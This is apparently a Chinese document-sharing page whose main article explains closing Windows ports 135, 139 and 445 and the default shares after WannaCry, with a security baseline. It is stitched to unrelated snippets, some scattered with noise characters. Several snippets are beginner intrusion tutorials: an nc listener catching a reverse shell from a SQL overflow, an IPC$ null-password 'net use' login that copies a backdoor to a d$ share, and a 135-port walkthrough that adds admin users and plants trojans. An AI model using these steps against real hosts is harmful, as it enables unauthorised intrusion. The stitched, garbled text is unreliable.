如何关闭Windows 的135、139、445端口及默认共享(图文)

如何关闭Windows的135、139、445端口和默认共享（图文)

为应对最新勒索病毒WannaCry（一种“蠕虫式”的病毒软件，大小3.3MB，由不法分子利用NSA（National Security Agency）泄露的危险漏洞“EternalBlue”（永恒之蓝）制作）攻击，各安全网站都提示除了安装最新MS17-010安全更新以外，还要关闭135、139、445端口及默认共享，但如何关闭网上提供的方法比较混乱，本文主要对各种方法进行测试及整理，分享给大家。

一、关闭135端口

135端口主要用于使用RPC（Remote Procedure Call，远程过程调用）协议并提供DCO M（分布式组件对象模型）服务。

端口说明：135端口主要用于使用RPC（Remote Procedure Call，远程过程调用）协议并提供DCOM（分布式组件对象模型）服务，通过RPC可以保证在一台计算机上运行的程序可以顺利地执行远程计算机上的代码；使用DCOM可以通过网络直接进行通信，能够跨包括HTTP协议在内的多种网络传输。RPC本身在处理通过TCP/IP的消息交换部分有一个漏洞，该漏洞是由于错误地处理格式不正确的消息造成的。该漏洞会影响到RPC 与DCOM之间的一个接口，该接口侦听的端口就是135。建议关闭该端口。

关闭135端口

1、单击“开始”——“运行”（或windows键+R键），输入“dcomcnfg”，单击“确定”，打开组件服务。

2、在弹出的“组件服务”对话框中，选择“计算机”选项，右键单击“我的电脑”，选择“属性”。

3、在出现的“我的电脑属性”对话框“默认属性”选项卡中，去掉“在此计算机上启用分布式COM”前的勾。

5、选择“默认协议”选项卡，选中“面向连接的TCP/IP”，单击“移除”按钮。

6、单击“确定”按钮，设置完成，winXP系统重新启动后即可关闭135端口。

7、对Win7及以上系统，通过以上设置无法彻底关闭135端口，需配合防火墙入站策略来进行防护，禁止外部连接135端口。

（具体步骤如下：点击【开始】按钮在弹出的菜单中点击【控制面板】项，在弹出的控制面板窗口中，点击【windows防火墙】；在弹出的窗口左侧中点击【高级设置】，进入高级安全windows防火墙设置项；点击左侧【入站规则】，然后点击右侧【操作】项中的【新建规则】按钮，弹出窗口；选中【端口】点击下一步，选中【TCP】，并选中【特定本地端口】在后面的输入框中输入端口号，如135点击下一步；选中指定的操作为【禁止连接】点击下一步，选择规则应用的网络，默认是全部选中的，采用默认即可，点击下一步；为新建的规则起名并做相应的描述（如禁用135端口），点击完成即可。还可以用同样方法禁止外部所有或部分（需在应用网络中设定许可IP）对本机139、44 5、3389端口访问。

二、关闭139端口方法

139端口是为“NetBIOS Session Service”提供的，主要用于提供Windows文件和打印机共享以及Unix中的Samba服务。

端口说明：139端口是为“NetBIOS Session Service”提供的，主要用于提供Windows文件和打印机共享以及Unix中的Samba服务。在Windows中要在局域网中进行文件的共享，必须使用该服务。

端口漏洞：开启139端口虽然可以提供共享服务，但是常常被攻击者所利用进行攻击，比如使用流光、SuperScan等端口扫描工具，可以扫描目标计算机的139端口，如果发现有漏洞，可以试图获取用户名和密码，这是非常危险的。

操作建议：如果不需要提供文件和打印机共享，建议关闭该端口。

关闭139端口

1、右键单击桌面右下角“本地连接”图标，选择“状态”。（win7以上系统右键选择打开“网络和共享中心”，然后点“更改适配器设置”）

2、在弹出的“本地连接状态”对话框中，单击“属性”按钮。

3、在出现的“本地连接属性”对话框中，选择“Internet协议（TCP/IP）”，双击打开。

4、在出现的“Internet协议（TCP/IP）属性”对话框中，单击“高级”按钮，在出现的“高级TCP/IP设置”对话框中，选择“WINS”选项卡。在“WINS”选项卡，“NetBIOS设置”下，选择“禁用TCP/IP上的”NetBIOS。单击“确定”，重新启动后即可关闭139端口。

三、关闭445端口方法

445端口是一个毁誉参半的端口，有了它我们可以在局域网中轻松访问各种共享文件夹或共享打印机，但也正是因为有了它，黑客们才有了可乘之机，2017年5月12日爆发的勒索病毒就是利用该端口。

1、单击“开始”——“运行”（或windows键+R键），输入“regedit”，单击“确定”按钮，

打开注册表。

2、找到注册表项“HKEY_LOCAL_MACHINE\System\Controlset\Services\NetBT\Parame ters”，选择“Parameters”项，右键单击，按照自己是32位还是64位系统，选择“新建”——“DWORD（32位）值”或“QDWORD（64位）值”，新建名为“SMBDeviceEnabled”

3、右键单击“SMBDeviceEnabled”值，选择“修改”。

4、在出现的“编辑DWORD值”对话框中，在“数值数据”下，输入“0”，单击“确定”按钮，完成设置。

windows7系统还要把操作系统的server服务关闭，依次点击“开始”，“运行”，输入serv ices.msc，进入服务管理控制台。找到server服务，双击进入管理控制页面。把这个服务的启动类型更改为“禁用”，服务状态更改为“停止”，最后点击应用即可（详细参加第四部分关闭默认共享）。

四、关闭默认共享方法

使用“NET SHARE共享文件夹/DELETE”及禁用共享方法(无法禁用IPC$共享）关闭后，但重启后仍会重新共享。以下几种方法可永久停用；

1、停止服务法（推荐）

还是到“计算机管理”窗口中，单击展开左侧的“服务和应用程序”并选中其中的“服务”，此时右侧就列出了所有服务项目。共享服务对应的名称是“Server”（在进程中的名称为s

ervices），找到后双击它，在弹出的“常规”标签中把“启动类型”由原来的“自动”更改为“已禁用”。然后单击下面“服务状态”的“停止”按钮，再确认一下就OK了

2、注册表改键值法

“开始”→“运行”输入“regedit”确定后，打开注册表编辑器，找到“HKEY_LOCAL_MACHIN E\SYSTEM\CurrentControlSet\Services

\lanmanserver\parameters”项，双击右侧窗口中的“AutoShareServer”项将键值由1改为0，这样就能关闭硬盘各分区的共享。如果没有AutoShareServer项，可自己新建一个再改键值。然后还是在这一窗口下再找到“AutoShareWks”项，也把键值由1改为0，关闭admin$共享。最后到“HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Contr ol\Lsa”项处找到“restrictanonymous”，将键值设为1，关闭IPC$共享。

注意：本法必须重启机器，但一经改动就会永远停止共享。

3、如果不使用共享服务，也可以取消“本地连接‘属性中的Microsoft“网络的文件和打印机共享”和“Microsoft网络客户端”勾选，然后直接卸载.

附件：Windows系统安全基线与配置说明

1、账户管理

1.1Administrator账户管理

配置截图参考：

右键点击administrator用户重命名为其它名称（注意，不要改为admin、root、user等常用名）

1.2Guest账户管理

双击guest账户，确保账户已禁用选项是被选中的则为符合要求。

1.3无关账户管理

安全判定依据1）进入“控制面板->管理工具->计算机管理”，在弹出框中选择“系统工具->本地用户和组->用户”，2）如果不存在无关账户，或无关账户处于禁用状态，表明符合安全要求。

参考操作删除无关账户：鼠标右键->删除；

如果用户里面存在guest和administrator（已改名账户）以外的其它账户则不符合安全要求须对其它用户进行右键——删除操作

2、密码管理

2.1密码复杂度

2.2密码长度最小值

2.3密码最长使用期限

2.4强制密码历史

2.5账户锁定阈值（可选）

安全基线要求对亍采用静态口令认证技术的设备，应配置当用户连续认证失败次数超过5次（不含5次），锁定该用户使用的账户，锁定时间未30分钟

检测操作参考进入“控制面板->管理工具->本地安全策略”，在“账户策略->账户锁定策略->账户锁定阈值”，鼠标史键->属性->5->确定。

安全判定依据进入“控制面板->管理工具->本地安全策略”，在“账户策略->账户锁定策略”中，选择“账户锁定阈值”，查看其“安全设置“，如果显示“5次无效登录“，锁定时间未30分钟,表明符合安全要求。

3、认证授权

3.1远程强制关机授权

3.2文件所有权授权

4、日志审计

4.1审核策略更改

4.2审核登录事件

4.3审核对象访问

4.4审核进程跟踪

手动封闭137、138、139、445端口

手动封端口的操作： 1．闭137、138、139端口。右击-网上邻居-属性/本地连接-属性， 在microsoft网络客户端前的小勾去掉。接着也把microsoft网络的文件和打印机共享的小勾也去掉。 然后点击internet协议/(TCP/IP)--属性--高级--WINS--禁用TCP/IP上的 NETBIOS--确定。禁用lmhosts服务。

注意：对于多网卡设备为每一个网络连接都要进行同样设置。 2．关闭445端口 关闭445端口的方法有很多，通常用修改注册表的方法： 1) 在命令行窗口运行修改注册表命令RegEdit。 2) 在弹出的注册表编辑窗口的左边找到下面目录 HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NetBT\Parameters 你可以一级一级目录往下点击，也可用“查找”命令找到NetBT项，然后点击 Parameters项。

3) 在编辑窗口的右边空白处点击鼠标右键，出现的“新建”菜单中选择 “DWORD值”，如下图所示： 修改注册表关闭不安全端口 4) 将新建的DWORD参数命名为“SMBDeviceEnabled”，数值为缺省的“0”。 5) 修改完后退出RegEdit，重启机器。 3．关闭135端口。禁用schedule服务，禁用MSDTC服务。 a)关闭135端口 一、单击”开始“——”运行“，输入”dcomcnfg“，单击”确定“，打开组件服务。 二、在弹出的”组件服务“对话框中，选择”计算机“选项。 三、在”计算机“选项右边，右键单击”的电脑“，选择”属性“. 四、在出现的”的电脑属性“对话框”默认属性“选项卡中，去掉”在此计算机上启用分布 式COM“前的勾。

各个端口的入侵方法(入侵菜鸟必看)

各个端口的入侵方法（入侵菜鸟必看）1. 1433端口入侵 scanport.exe 查有1433的机器 SQLScanPass.exe 进行字典暴破（字典是关键） 最后SQLTools.exe入侵 对sql的sp2及以下的系统，可用sql的hello 溢出漏洞入侵。 nc -vv -l -p 本机端口sqlhelloF.exe 入侵ip 1433 本机ip 本机端口 （以上反向的，测试成功） sqlhelloz.exe 入侵ip 1433 （这个是正向连接） 2. 4899端口入侵 用4899过滤器.exe，扫描空口令的机器 3. 3899的入侵 对很早的机器，可以试试3389的溢出(win3389ex.exe) 对2000的机器，可以试试字典暴破。(tscrack.exe) 4. 80入侵 对sp3以前的机器，可以用webdav入侵； 对bbs论坛，可以试试上传漏洞（upfile.exe或dvup_delphi.exe） 可以利用SQL进行注入。（小榕的注入软件）。 5. serv-u入侵(21端口） 对5. 004及以下系统，可用溢出入侵。（serv5004.exe） 对5.1.0.0及以下系统，可用本地提升权限。（servlocal.exe）

====================================== 对serv-u的MD5加密密码，可以用字典暴破。（crack.vbs） 输入一个被serv-u加密的密码（34位长），通过与字典档（dict.txt）的比较，得到密码。如：cscript crack.vbs ib0AD10648F17E9E8D1FF316C1BA75105A 6. 554端口 用real554.exe入侵。 7. 6129端口 用DameWare6129.exe入侵。 8. 系统漏洞 利用135、445端口，用ms03026、ms03039、ms03049、ms04011漏洞， 进行溢出入侵。 9. 3127等端口 可以利用doom病毒开的端口，用nodoom.exe入侵。（可用mydoomscan.exe查）。 10. 其他入侵 利用shanlu的入侵软件入侵（WINNTAutoAttack.exe）。 各种端口的入侵方法1. 1433端口入侵 scanport.exe 查有1433的机器 SQLScanPas*.**e 进行字典暴破（字典是关键） 最后SQLTool*.**e入侵 对sql的sp2及以下的系统，可用sql的hello 溢出漏洞入侵。

常用的端口入侵

21端口： 21端口是默认的FTP端口，利用方式：弱口令探测/溢出 目前我还没看到远程溢出的，SERU的本地溢出漏洞风靡一时，曾经很多服务器就在沦丧于这个漏洞。 22端口 22端口是SSH远程登录协议，利用方式：弱口令探测 23端口 23端口是TLENET的默认端口，利用方式：弱口令探测/溢出 一般大家用弱口令探测得比较多，但是成功率比较低，还是溢出来得快，毕竟权限高，想做什么都可以！ 25端口 25端口是SMTP协议的默认端口，邮件接收服务器。利用方式：溢出 53端口 53端口是DNS服务的默认端口，提供域名服务器， 利用方式：溢出。这个今年很火，我试了一下，一晚上差不多可以溢出10W台开几抬肉鸡的话 79端口 79端口Finger服务的默认端口(查询远程主机在线用户等信息)，可以在辅助入侵中获取更多的主机信息。利用FINGER服务可以查询到主机很多敏感的信息，在入侵的时候常常可以起到意想不到的作用。

80端口 80端口是IIS的默认端口，全球信息网超文本传输协议(www)。利用方式：IIS溢出/SQL注入/旁注/跨站。不过一部分路由器的远程管理端口也是80。SQL注入大家已经很熟悉了吧，IIS溢出也只存在那些很老的机器上，看运气了。 110端口 110端口提供 Pop3 服务。邮件发送服务器。利用方式：溢出。 135端口 135端口提供查询服务。利用方式：IPC$(Internet Process Connection)入侵。 网上教程非常多，不多说了。 137端口 137端口统共NetBIOS 数据报(UDP)服务。 139端口 139端口提供共享资源服务(NetBios-SSN)，用在IPC$入侵中。上面这三个端口可以综合利用。 161端口 161端口是远程管理设备(SNMP)的默认端口。这个很多小菜不知道怎么利用，那么重点来说说这个。 SNMP是简单网络管理协议，不清楚百度一下，很多小菜扫描出来了SNMP的弱口令，比如private,public等等，但是不知道怎么利用，这里介绍两款工具：IP NetWork browse 和LANguard NetWork Scnaner,这两个工具都可以扫描SNMP，而且可以扫描到，磁盘，服务，

135端口入侵的方法(简单)

135端口入侵的方法(简单) （1）通过135端口入侵，攻击者首先需要查找网络上存在135端口漏洞的主机地址，在查找此类主机过程中，可以使用一些扫描工具，比如SuperScan就是典型的端口工具之一。在SuperScan“开始”文本框中输入需要扫描的起始地址，然后在“结束”文本框里填写好扫描结束的IP地址，在“扫描类型”选项中选择“所有端口定义”单选按钮，并在右侧的文本框中输入“135”。再点击“开始”按钮即可开始扫描。扫描结束后，在下方的列表中可以查看目标主机打开的端口。然后再点击“Save”按钮选好保存路径，把里面有漏洞的IP整理下即可。 （2）得到有漏洞后，我们还有一个功能强大的扫描工具，比如NTSscn汉化版。然后在“主机文件“处点击“打开”按钮找到我们刚才保存的IP路径，在连接共享$处选择“WMI扫描”，在“扫描打开端口的主机”处填写135端口。最后点击“开始”即可。要不了多久就会有结果显示。 （3）获得漏洞主机用户名以后，我们需要一个开启的工具，那就是Recton v2.5。好了，万事具备之欠那“东风”拉。把刚刚扫描的IP输入TELNET界面的“远程主机”处，以及用户名和密码，不过一般情况下密码都是空。下一步点击“开始执行”按钮等待把TELNET打开吧。打开后按WIN+R输入CMD进入再输入Telnet IP 回车，会提示让你输入用户名，把用户名输入后，回车即可进入主机。而且得到的还是SYSTEM 权限。 下一步就是为我们加了拥有管理员权限的用户，看看我杰作。最后我们可以上传一些远程性木马软件作为后门，比如灰鸽子，冰河等。在这里我就不在展示。我还是喜欢3389端口，那我就给他上传个开启3389的脚本，不过对于开启3389端口的工具网上还真的不少，比如Recton v2.5就有这个功能。好了3389端口已经成功开启大家看我连接的

常用端口号与对应的服务以及端口关闭

常用端口号与对应的服务以及端口关闭 端口简介：本文介绍端口的概念，分类，以及如何关闭/开启一个端口 21端口：21端口主要用于FTP（File Transfer Protocol，文件传输协议）服务。 23端口：23端口主要用于Telnet（远程登录）服务，是Internet上普遍采用的登录和仿真程序。 25端口：25端口为SMTP（Simple Mail Transfer Protocol，简单邮件传输协议）服务器所开放，主要用于发送邮件，如今绝大多数邮件服务器都使用该协议。 53端口：53端口为DNS（Domain Name Server，域名服务器）服务器所开放，主要用于域名解析，DNS 服务在NT系统中使用的最为广泛。 67、68端口：67、68端口分别是为Bootp服务的Bootstrap Protocol Server（引导程序协议服务端）和Bootstrap Protocol Client（引导程序协议客户端）开放的端口。 69端口：TFTP是Cisco公司开发的一个简单文件传输协议，类似于FTP。 79端口：79端口是为Finger服务开放的，主要用于查询远程主机在线用户、操作系统类型以及是否缓冲区溢出等用户的详细信息。 80端口：80端口是为HTTP（HyperText Transport Protocol，超文本传输协议）开放的，这是上网冲浪使用最多的协议，主要用于在WWW（World Wide Web，万维网）服务上传输信息的协议。 99端口：99端口是用于一个名为“Metagram Relay”（亚对策延时）的服务，该服务比较少见，一般是用不到的。 109、110端口：109端口是为POP2（Post Office Protocol Version 2，邮局协议2）服务开放的，110端口是为POP3（邮件协议3）服务开放的，POP2、POP3都是主要用于接收邮件的。 111端口：111端口是SUN公司的RPC（Remote Procedure Call，远程过程调用）服务所开放的端口，主要用于分布式系统中不同计算机的内部进程通信，RPC在多种网络服务中都是很重要的组件。 113端口：113端口主要用于Windows的“Authentication Service”（验证服务）。 119端口：119端口是为“Network News Transfer Protocol”（网络新闻组传输协议，简称NNTP）开放的。 135端口：135端口主要用于使用RPC（Remote Procedure Call，远程过程调用）协议并提供DCOM（分布式组件对象模型）服务。

服务器135137138139445等端口解释和关闭方法

服务器135、137、138、139、445等端口解释和关闭方法 在服务器中，3389端口的开放是必需的，因为任何服务器的管理员如果想很好地管理自己的服务器，都需要开启这种方便的网络管理服务。不过3389端口一旦开启，必然会引来无数黑客，即便那些黑客破解不了密码，也很可能占用你的连接请求数，使你无法登录自己的服务器。 关闭服务器中的3389端口的方法很简单。在windows2000或2003中，进入控制面板，然后选择“管理工具”中的“服务”，在弹出的服务列表中，选中“Terminal Services”，将该服务的启动类型改为“手动”，然后停止这个服务就可关闭3389 端口了。 在windows XP中被黑客悄悄开启远程协作的现象也不是没有发生过。可以右键点击“我的电脑”，进入“系统属性”窗口中的“远程”选项卡界面，取消对“远程桌面”和“远程协作”选择，再单击确定即可关闭3389端口。135端口： 利用135端口的黑客想要得到管理员的宇航局码和口令，过程往往是很简单，他们似乎部有自己的方法和手段。关闭135端口，停止可能被黑客利用的RPC服务，不给他们任何能够利用系统弱点的机会。 但单纯地将RPC服务停止会对某些网络用户造成不必要的麻烦。在网络中，只有使用微软DCOM技术的程序才会调

用RemoteProcedure Call，也就是135端口服务，所以在面临这个问题时，将DCOM服务停止是最好的方法。 首先点击“开始”菜单，在“运行”里输入dcomcnfg.exe命令，在弹出的设置窗口中选择“默认设置”标签选项，然后点击选择此选项页面中的“在这台计算机上启用分布式COM”选项，最后点击确定完成。这样你就可以很好地保护你的电脑了，任何黑客都无法对你电脑中的DCOM服务和DCOM应用程序进行远程操作与访问，达到了既不关闭又能够停止135端口，让黑客放弃攻击你的目的。137、138端口： 在关闭137和138端口之前，先介绍一下NetBIOS服务。很多人认为NetBIOS服务是一个网络协议，其实不然。NetBIOS只是网络基本的输入/输出系统，是一个应用于程序接口，用于数据源与目的地之间的数据交换。不过它所包含的端口及一些命名原则属于OSI(Open System Interconnection)模式的上三层，与低层的通讯协议是全然独立的。因此NetBIOS服务能够成功地建构于不同的通讯协议上，让它支持访问计算机应用程序和设备通信时所要用到各种服务。正是由于考虑到了NetBIOS服务这种基于TCP/IP 协议下的特点，而NetNBIOS又完全依靠137、138端口支撑，因此如果停止了NetBIOS，就能够将137和138端口的危险根除。 停止NetBIOS方法很简单，鼠标右击桌面上的“网上邻居”图

常用黑客工具(网络入侵工具)

常用黑客工具（网络入侵工具） 一、扫描工具 X-scan 3.1 焦点出的扫描器，国内最优秀的安全扫描软件之一!非常专业的一个扫描器! X-way 2.5 这也上一个非常不错的扫描器哦!功能非常多!使用也不难,入侵必备工具! SuperScan 3.0 强大的TCP 端口扫描器、Ping 和域名解析器! Namp 3.5 这个就厉害了,安全界人人皆知的非常有名气的一个扫描器!作者Fyodor Hscan v1.20 这是款运行在Win NT/2000下的漏洞扫描工具，有GUI以及命令行两种扫描方式! SSS 俄罗斯安全界非常专业的一个安全漏洞扫描软件! U-Scan.exe 非常好的UNICODE漏洞扫描工具! RpcScan V1.1 可以通过135端口枚举远程主机RPC连接信息! SHED 1.01 一个用来扫描共享漏洞的机器的工具! DSScan V1.00 ms04-011 远程缓冲区溢出漏洞扫描专用! Dotpot PortReady1.6 该软件为“绿色软件”，无需安装，非常小巧（仅23KB），具有极快的扫描速度! WebDAVScan v1.0 针对WEBDA V漏洞的扫描工具! 注意:该软件解压缩时会被查杀! Socks Proxy Finder2 扫描端口速度非常快的一个工具,扫描完毕后还可以导出保存起来! SQLScan v1.2 猜解开着1433端口的住机密码工具! RPC漏洞扫描器v1.03 针对RPC漏洞扫描的工具! 流光5.0 破解版国内大名鼎鼎的黑客扫描工具,由高级程序员小榕编写! 自动攻击探测机Windows NT/2000 自动攻击探测机 4899空口令探测能够快速的扫描到被安装了radmin服务端4899端口的空口令IP! 二、远程控制

屏蔽135 139 445 3389端口的方法以及网络端口安全防护技巧

屏蔽135 139 445 3389端口的方法以及网络端口安全防护技巧 默认情况下，Windows有很多端口是开放的，在你上网的时候，网络病毒和黑客可以通过这些端口连上你的电脑。为了让你的系统变为铜墙铁壁，应该封闭这些端口，主要有：TCP 135、139、445、593、1025 端口和UDP 135、137、138、445 端口，一些流行病毒的后门端口（如TCP 2745、3127、6129 端口），以及远程服务访问端口3389。下面介绍如何在WinXP/2000/2003下关闭这些网络端口： 第一步，点击“开始”菜单/设置/控制面板/管理工具，双击打开“本地安全策略”，选中“IP 安全策略，在本地计算机”，在右边窗格的空白位置右击鼠标，弹出快捷菜单，选择“创建IP 安全策略”（如右图），于是弹出一个向导。在向导中点击“下一步”按钮，为新的安全策略命名；再按“下一步”，则显示“安全通信请求”画面，在画面上把“激活默认相应规则”左边的钩去掉，点击“完成”按钮就创建了一个新的IP 安全策略。 第二步，右击该IP安全策略，在“属性”对话框中，把“使用添加向导”左边的钩去掉，然后单击“添加”按钮添加新的规则，随后弹出“新规则属性”对话框，在画面上点击“添加”按钮，弹出IP筛选器列表窗口；在列表中，首先把“使用添加向导”左边的钩去掉，然后再点击右边的“添加”按钮添加新的筛选器。 第三步，进入“筛选器属性”对话框，首先看到的是寻址，源地址选“任何IP 地址”，目标地址选“我的IP 地址”；点击“协议”选项卡，在“选择协议类型”的下拉列表中选择“TCP”，然后在“到此端口”下的文本框中输

黑客常用的几种入侵端口的方法

【托管服务qin】黑客常用的几种入侵端口的方法 服务器托管, BGP, 光钎专线, 防火墙, 新一代IDC 工欲善其事，必先利其器，本文简单介绍目前黑客最常使用的一些入 侵工具及防御的方法，希望能对大家有所帮助，以助于大家能更好地防御黑客的攻击。" ^' D( E3 K! N) ^! c 1. 1433端口入侵 scanport.exe 查有1433的机器 SQLScanPass.exe 进行字典暴破（字典是关键）7 L5 a9 T" E: C& x' k* C 最后SQLTools.exe入侵4 r+ F" q g9 j- K9 m* x4 o' E =============================2 z0 ~3 T) K5 n8 W; Z 对sql的sp2及以下的系统，可用sql的hello 溢出漏洞入侵。 nc -vv -l -p 本机端口sqlhelloF.exe 入侵ip 1433 本机ip 本机端口 （以上反向的，测试成功）) Q) Q7 K+ L! J$ o6 Z9 w( a sqlhelloz.exe 入侵ip 1433 （这个是正向连接）% J3 L6 x8 y: t; p 2. 4899端口入侵9 `" f0 r# k2 ^: F 用4899过滤器。exe，扫描空口令的机器 3. 3899的入侵 对很早的机器，可以试试3389的溢出（win3389ex.exe） 对2000的机器，可以试试字典暴破。（tscrack.exe）* X8 }: O! |2 }& x7 M 4. 80入侵+ J9 [0 L4 _) B! K 对sp3以前的机器，可以用webdav入侵；

137和139端口的详细介绍

137端口 端口说明：137端口主要用于“NetBIOS Name Service”（NetBIOS名称服务），属于UDP端口，使用者只需要向局域网或互联网上的某台计算机的137端口发送一个请求，就可以获取该计算机的名称、注册用户名，以及是否安装主域控制器、IIS是否正在运行等信息。 端口漏洞：因为是UDP端口，对于攻击者来说，通过发送请求很容易就获取目标计算机的相关信息，有些信息是直接可以被利用，并分析漏洞的，比如IIS 服务。另外，通过捕获正在利用137端口进行通信的信息包，还可能得到目标计算机的启动和关闭的时间，这样就可以利用专门的工具来攻击。 操作建议：建议关闭该端口。 本人实践:远程重起,关闭计算机,开启3389,telnet 是个很有用的收集信息的方法，对入侵很有帮助的。 Command: nbtstat -a [target ip] Table: -------------------------------------------------------------------------------- NameNo.TypeUsage 00 UniqueWorkstation Service 01 U Messenger Service <\\--__MSBROWSE>01 Group Mmaster Browser 03 U Messenger Service 06 U RAS Server Service 1F U NetDDE Service 20 U File Server Service 21 U RAS Client Service 22 U Microsoft Exchange Interchange(MSMail Connector) 23 U Microsoft Exchange Store 24 U Microsoft Exchange Directory 30 U Modem Sharing Server Service 31 U Modem Sharing Client Service 43 U SMS Client Remot Control 44 U SMS Admiinistrators Remote ControlTool 45 U SMS Clients Remote Chat 46 U SMS Clients Remote Transfer

139端口入侵简易教程

139端口入侵简易教程; net use \\192.168.0.1\ipc$ "" /user:administrator 提到139端口，我想知道的人一定非常多，本来是不想用写这个教程的，但考虑要照顾到新人，所以还是简单的写一下。 首先，连接的命令是： net<空格>use<空格>\\IP地址\ipc$<空格>密码<空格>/user:用户名 假设我要连接的目标IP地址是：192.168.1.11，用户名是google,使用的密码是123456,那么连接对方139端口通道的格式就是这样的： net use \\192.168.1.11\ipc$ 123456 /user:google 如果连接成功，那么系统会提示"命令成功完成"! 空密码是这样的： 如果密码是空的，那就在原先输入密码的地方以""代替。 开始查看权限： 查看登录后用户权限的方法很简单，只要给目标系统传个文件就可以了，如果传诵成功，那么一般都是系统管理员权限了，如果不成功可能就是来访者权限或者其他用户组的。命令的格式是这样的： copy<>文件绝对路径<>\\IP地址\文件目标路径 比如我要将本地C盘下的a.exe文件拷贝到192.168.1.11的D盘下： copy c:\a.exe \\192.168.1.11\d$ 要注意"$"符，那是隐藏共享盘的表示符，如果对方的共享盘不是隐藏的，就不需要"$"符了。如果命令执行成功，系统同样会提示"已复制1 个文件" 小技巧： 再次复制相同文件至相同路径，以检测是否存在杀毒软件！！！ 如果系统提示“改写\\192.168.1.11\d$\a.exe 吗? (Yes/No/All):”则说明文件在还在目标系统上，没有被杀毒软件查杀（一般发送过去的都是后门程序只类的东西，只有系统安装了杀毒软件都会被杀掉）。如果没有提示，则说明安装了杀毒软件。

135,137,138,139、445端口的作用

135,137,138,139端口的作用 135端口：135端口主要用于使用RPC（Remote Procedure Call，远程过程调用）协议并提供DCOM（分布式组件对象模型）服务。 端口说明：135端口主要用于使用RPC（Remote Procedure Call，远程过程调用）协议并提供DCOM（分布式组件对象模型）服务，通过RPC可以保证在一台计算机上运行的程序可以顺利地执行远程计算机上的代码；使用DCOM可以通过网络直接进行通信，能够跨包括HTTP协议在内的多种网络传输。 端口漏洞：很多Windows 2000和Windows XP用户都中了“冲击波”病毒，该病毒就是利用RPC漏洞来攻击计算机的，端口就是135。 137端口：137端口主要用于“NetBIOS Name Service”（NetBIOS名称服务）。 端口说明：137端口主要用于“NetBIOS Name Service”（NetBIOS名称服务），属于UDP端口，使用者只需要向局域网或互联网上的某台计算机的137端口发送一个请求，就可以获取该计算机的名称、注册用户名，以及是否安装主域控制器、IIS是否正在运行等信息。 端口漏洞：因为是UDP端口，对于攻击者来说，通过发送请求很容易就获取目标计算机的相关信息，有些信息是直接可以被利用，并分析漏洞的，比如IIS 服务。另外，通过捕获正在利用137端口进行通信的信息包，还可能得到目标计算机的启动和关闭的时间，这样就可以利用专门的工具来攻击。 139端口：139端口是为“NetBIOS Session Service”提供的，主要用于提供Windows文件和打印机共享以及Unix中的Samba服务。 端口说明：139端口是为“NetBIOS Session Service”提供的，主要用于提供Windows文件和打印机共享以及Unix中的Samba服务。在Windows中要在局域网中进行文件的共享，必须使用该服务。比如在Windows 98中，可以打开“控制面板”，双击“网络”图标，在“配置”选项卡中单击“文件及打印共享”按钮选中相应的设置就可以安装启用该服务；在Windows 2000/XP中，可以打开“控制面板”，双击“网络连接”图标，打开本地连接属性；接着，在属性窗口的“常规”选项卡中选择“Internet协议（TCP/IP）”，单击“属性”按钮；然后在打开的窗口中，单击“高级”按钮；在“高级TCP/IP设置”窗口中选择“WINS”选项卡，在“NetBIOS设置”区域中启用TCP/IP上的NetBIOS。 端口漏洞：开启139端口虽然可以提供共享服务，但是常常被攻击者所利用进行攻击，比如使用流光、SuperScan等端口扫描工具，可以扫描目标计算机的139端口，如果发现有漏洞，可以试图获取用户名和密码，这是非常危险的。 。

关闭135、137、139、445、3389端口的方法

关闭135、137、139、445、3389端口的方法操作前请您根据对业务的影响情况进行评估 关闭135端口方法： 操作建议：为了避免“冲击波”病毒的攻击，建议关闭135端口。 一、单击“开始”——“运行”，输入“dcomcnfg”，单击“确定”，打开组件服务。 二、在弹出的“组件服务”对话框中，选择“计算机”选项。 三、在“计算机”选项右边，右键单击“我的电脑”，选择“属性”。

四、在出现的“我的电脑属性”对话框“默认属性”选项卡中，去掉“在此计算机上启用分布式COM”前的勾。 五、选择“默认协议”选项卡，选中“面向连接的TCP/IP”，单击“删除”按钮。

六、单击“确定”按钮，设置完成，重新启动后即可关闭135端口。 关闭137、139端口方法： 操作建议：如果不需要提供文件和打印机共享，建议关闭137、139端口。一、右键单击桌面右下角“本地连接”图标，选择“状态”。在弹出的“本地连接状态”对话框中，单击“属性”按钮。

二、在出现的“本地连接属性”对话框中，选择“Internet协议（TCP/IP）”，双击打开。 三、在出现的“Internet协议（TCP/IP）属性”对话框中，单击“高级”按钮。

四、在出现的“高级TCP/IP设置”对话框中，选择“WINS”选项卡，在“WINS”选项卡，“NetBIOS设置”下，选择“禁用TCP/IP上的”NetBIOS。

五、单击“确定”，重新启动后即可关闭137、139端口。 关闭445端口的方法： 一、单击“开始”——“运行”，输入“regedit”，单击“确定”按钮，打开注册表。 二、找到注册表项 “HKEY_LOCAL_MACHINE\System\currentControlset\Services\NetBT\Parame ters”。 三、选择“Parameters”项，右键单击，选择“新建”——“DWORD值”。

TCP端口号对照表

1=tcpmux 2=compressnet 3=compressnet 4=Unassigned 5=Remote Job Entr 6=Unassigned 7=Echo 8=Unassigned 9=Discard 10=Unassigned 11=Active Users 12=Unassigned 13=Daytime 14=Unassigned 15=Unassigned 16=Unassigned 17=Quote of the Day 18=Message Send Protocol 19=Character Generator 20=FTP (Data) 21=FTP (Control) 22=Unassigned 23=Telnet 24=Private mail-system 25=SMTP 26=Unassigned 27=NSW User System FE 28=Unassigned 29=MSG ICP 30=Unassigned 31=MSG Authentication 32=Unassigned 33=Display Support Protocol 34=Unassigned 35=Private printer server 36=Unassigned 37=Time 38=Route Access Protocol 39=Resource Location Protocol 40=Unassigned 41=Graphics 42=Host Name Server 43=Who Is 44=MPM FLAGS Protocol

常用端口号大全

